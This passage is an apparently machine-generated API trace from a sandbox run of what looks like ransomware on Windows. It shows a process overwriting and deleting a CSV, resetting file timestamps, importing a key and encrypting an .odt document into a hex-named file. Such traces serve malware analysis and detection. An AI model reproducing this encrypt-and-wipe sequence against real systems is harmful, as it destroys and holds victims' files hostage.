0x0 [0076.511] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.512] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.512] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.513] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.514] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.515] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.515] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.516] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.517] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.518] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x1000, lpOverlapped=0x0) returned 1 [0076.518] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.518] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.519] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.520] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.521] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.521] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.522] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.523] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.524] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.524] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.525] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x1000, lpOverlapped=0x0) returned 1 [0076.525] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.526] WriteFile (in: hFile=0x36c, lpBuffer=0x21c5108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x21c5108*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.527] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.527] SetEndOfFile (hFile=0x36c) returned 1 [0076.528] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.528] CloseHandle (hObject=0x36c) returned 1 [0076.528] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", lpFilePart=0x0) returned 0x3c [0076.528] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.528] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\vamsgjg.csv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.528] GetFileType (hFile=0x36c) returned 0x1 [0076.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.529] GetFileType (hFile=0x36c) returned 0x1 [0076.529] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d278, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.529] CloseHandle (hObject=0x36c) returned 1 [0076.529] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", lpFilePart=0x0) returned 0x3c [0076.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.529] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\vamsgjg.csv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.529] GetFileType (hFile=0x36c) returned 0x1 [0076.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.529] GetFileType (hFile=0x36c) returned 0x1 [0076.529] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d278, lpLastWriteTime=0x0) returned 1 [0076.529] CloseHandle (hObject=0x36c) returned 1 [0076.529] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", lpFilePart=0x0) returned 0x3c [0076.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.529] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\vamsgjg.csv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.529] GetFileType (hFile=0x36c) returned 0x1 [0076.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.530] GetFileType (hFile=0x36c) returned 0x1 [0076.530] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d278) returned 1 [0076.530] CloseHandle (hObject=0x36c) returned 1 [0076.530] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", lpFilePart=0x0) returned 0x3c [0076.530] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\vamsgjg.csv")) returned 1 [0076.536] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\vAMsgJG.csv", lpFilePart=0x0) returned 0x3c [0076.536] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\E6E0F8CDCC9B853D6373319A5B0E9869", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\E6E0F8CDCC9B853D6373319A5B0E9869", lpFilePart=0x0) returned 0x51 [0076.536] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.536] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\E6E0F8CDCC9B853D6373319A5B0E9869" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\e6e0f8cdcc9b853d6373319a5b0e9869"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.536] GetFileType (hFile=0x36c) returned 0x1 [0076.536] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.536] GetFileType (hFile=0x36c) returned 0x1 [0076.536] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d318, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.537] CloseHandle (hObject=0x36c) returned 1 [0076.537] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\E6E0F8CDCC9B853D6373319A5B0E9869", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\E6E0F8CDCC9B853D6373319A5B0E9869", lpFilePart=0x0) returned 0x51 [0076.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.537] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\E6E0F8CDCC9B853D6373319A5B0E9869" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\e6e0f8cdcc9b853d6373319a5b0e9869"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.537] GetFileType (hFile=0x36c) returned 0x1 [0076.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.537] GetFileType (hFile=0x36c) returned 0x1 [0076.537] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d318, lpLastWriteTime=0x0) returned 1 [0076.537] CloseHandle (hObject=0x36c) returned 1 [0076.537] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\E6E0F8CDCC9B853D6373319A5B0E9869", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\E6E0F8CDCC9B853D6373319A5B0E9869", lpFilePart=0x0) returned 0x51 [0076.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.537] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\E6E0F8CDCC9B853D6373319A5B0E9869" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\e6e0f8cdcc9b853d6373319a5b0e9869"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.537] GetFileType (hFile=0x36c) returned 0x1 [0076.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.537] GetFileType (hFile=0x36c) returned 0x1 [0076.537] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d318) returned 1 [0076.538] CloseHandle (hObject=0x36c) returned 1 [0076.538] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", lpFilePart=0x0) returned 0x47 [0076.538] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", lpFilePart=0x0) returned 0x47 [0076.539] CryptImportKey (in: hProv=0x1a5b8010, pbData=0x21c85f8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d120 | out: phKey=0x1bf5d120*=0x1a626ec0) returned 1 [0076.539] CryptContextAddRef (hProv=0x1a5b8010, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.539] CryptExportKey (in: hKey=0x1a626ec0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5d230 | out: pbData=0x0*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.539] CryptExportKey (in: hKey=0x1a626ec0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x21c86e8, pdwDataLen=0x1bf5d230 | out: pbData=0x21c86e8*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.539] CryptImportKey (in: hProv=0x1a5b8010, pbData=0x21c8808, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d0f0 | out: phKey=0x1bf5d0f0*=0x1a626ad0) returned 1 [0076.539] CryptContextAddRef (hProv=0x1a5b8010, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.539] CryptContextAddRef (hProv=0x1a5b8010, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.539] CryptDuplicateKey (in: hKey=0x1a626ad0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d0e0 | out: phKey=0x1bf5d0e0*=0x1a626f30) returned 1 [0076.539] CryptContextAddRef (hProv=0x1a5b8010, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.539] CryptSetKeyParam (hKey=0x1a626f30, dwParam=0x4, pbData=0x21c8950*=0x1, dwFlags=0x0) returned 1 [0076.539] CryptSetKeyParam (hKey=0x1a626f30, dwParam=0x1, pbData=0x21c8900, dwFlags=0x0) returned 1 [0076.539] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0076.539] CryptReleaseContext (hProv=0x1a5b8010, dwFlags=0x0) returned 1 [0076.539] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt", lpFilePart=0x0) returned 0x47 [0076.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.540] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\WbzYG9EBYngVeBZSG4.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\wbzyg9ebyngvebzsg4.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.540] GetFileType (hFile=0x36c) returned 0x1 [0076.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.540] GetFileType (hFile=0x36c) returned 0x1 [0076.540] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\D8D96E2E7400FA671E2DE5900B4A63DC", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\D8D96E2E7400FA671E2DE5900B4A63DC", lpFilePart=0x0) returned 0x51 [0076.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.540] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\D8D96E2E7400FA671E2DE5900B4A63DC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\d8d96e2e7400fa671e2de5900b4a63dc"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a4 [0076.540] GetFileType (hFile=0x3a4) returned 0x1 [0076.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.540] GetFileType (hFile=0x3a4) returned 0x1 [0076.540] ReadFile (in: hFile=0x36c, lpBuffer=0x21c8d40, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x21c8d40*, lpNumberOfBytesRead=0x1bf5d128*=0x14000, lpOverlapped=0x0) returned 1 [0076.542] CryptEncrypt (in: hKey=0x1a626f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21dcd58*, pdwDataLen=0x1bf5d180*=0x14000, dwBufLen=0x14000 | out: pbData=0x21dcd58*, pdwDataLen=0x1bf5d180*=0x14000) returned 1 [0076.542] WriteFile (in: hFile=0x3a4, lpBuffer=0x21dcd58*, nNumberOfBytesToWrite=0x14000, lpNumberOfBytesWritten=0x1bf5d118, lpOverlapped=0x0 | out: lpBuffer=0x21dcd58*, lpNumberOfBytesWritten=0x1bf5d118*=0x14000, lpOverlapped=0x0) returned 1 [0076.544] ReadFile (in: hFile=0x36c, lpBuffer=0x21c8d40, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x21c8d40*, lpNumberOfBytesRead=0x1bf5d128*=0xd6, lpOverlapped=0x0) returned 1 [0076.544] CryptEncrypt (in: hKey=0x1a626f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21f0d98*, pdwDataLen=0x1bf5d180*=0xd0, dwBufLen=0xd0 | out: pbData=0x21f0d98*, pdwDataLen=0x1bf5d180*=0xd0) returned 1 [0076.544] ReadFile (in: hFile=0x36c, lpBuffer=0x21c8d40, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x21c8d40*, lpNumberOfBytesRead=0x1bf5d128*=0x0, lpOverlapped=0x0) returned 1 [0076.545] CryptEncrypt (in: hKey=0x1a626f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21f1ec0*, pdwDataLen=0x1bf5d0c0*=0x10, dwBufLen=0x10 | out: pbData=0x21f1ec0*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.545] CryptEncrypt (in: hKey=0x1a626f30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x21f1f10*, pdwDataLen=0x1bf5d0c0*=0x0, dwBufLen=0x10 | out: pbData=0x21f1f10*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.545] WriteFile (in: hFile=0x3a4, lpBuffer=0x21f0ea8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x1bf5d048, lpOverlapped=0x0 | out: lpBuffer=0x21f0ea8*, lpNumberOfBytesWritten=0x1bf5d048*=0xe0, lpOverlapped=0x0) returned 1 [0076.545] CloseHandle (hObject=0x3a4) returned 1 [0076.546] CloseHandle (hObject=0x36c) returned 1 [0076.546] CryptDestroyKey (hKey=0x1a626ec0) returned 1 [0076.546] CryptReleaseContext (hProv=0x1a5b8010, dwFlags=0x0) returned 1 [0076.546] CryptReleaseContext (hProv=0x1a5b8010, dwFlags=0x0) returned 1 [0076.546] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\D8D96E2E7400FA671E2DE5900B4A63DC", nBufferLength=0x105, lpBuffer=0x1bf5cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\D8D96E2E7400FA671E2DE5900B4A63DC", lpFilePart=0x0) returned 0x51 [0076.546] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d060) returned 1 [0076.546] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\D8D96E2E7400FA671E2DE5900B4A63DC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\d8d96e2e7400fa671e2de5900b4a63dc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.547] GetFileType (hFile=0x36c) returned 0x1 [0076.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfd0) returned 1 [0076.547] GetFileType (hFile=0x36c) returned 0x1 [0076.547] ReadFile (in: hFile=0x36c, lpBuffer=0x21f2650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21f2650*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.548] ReadFile (in: hFile=0x36c, lpBuffer=0x21f2650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21f2650*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.549] ReadFile (in: hFile=0x36c, lpBuffer=0x21f2650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21f2650*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.550] ReadFile (in: hFile=0x36c, lpBuffer=0x21f2650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21f2650*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.551] ReadFile (in: hFile=0x36c, lpBuffer=0x21f2650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21f2650*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.551] ReadFile (in: hFile=0x36c, lpBuffer=0x21f2650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21f2650*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.551] ReadFile (in: hFile=0x36c, lpBuffer=0x21f2650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21f2650*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.551] ReadFile (in: hFile=0x36c, lpBuffer=0x21f2650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21f2650*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.551] ReadFile (in: hFile=0x36c, lpBuffer=0x21f2650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21f2650*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.552] ReadFile (in: hFile=0x36c, lpBuffer=0x21f2650, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21f2650*, 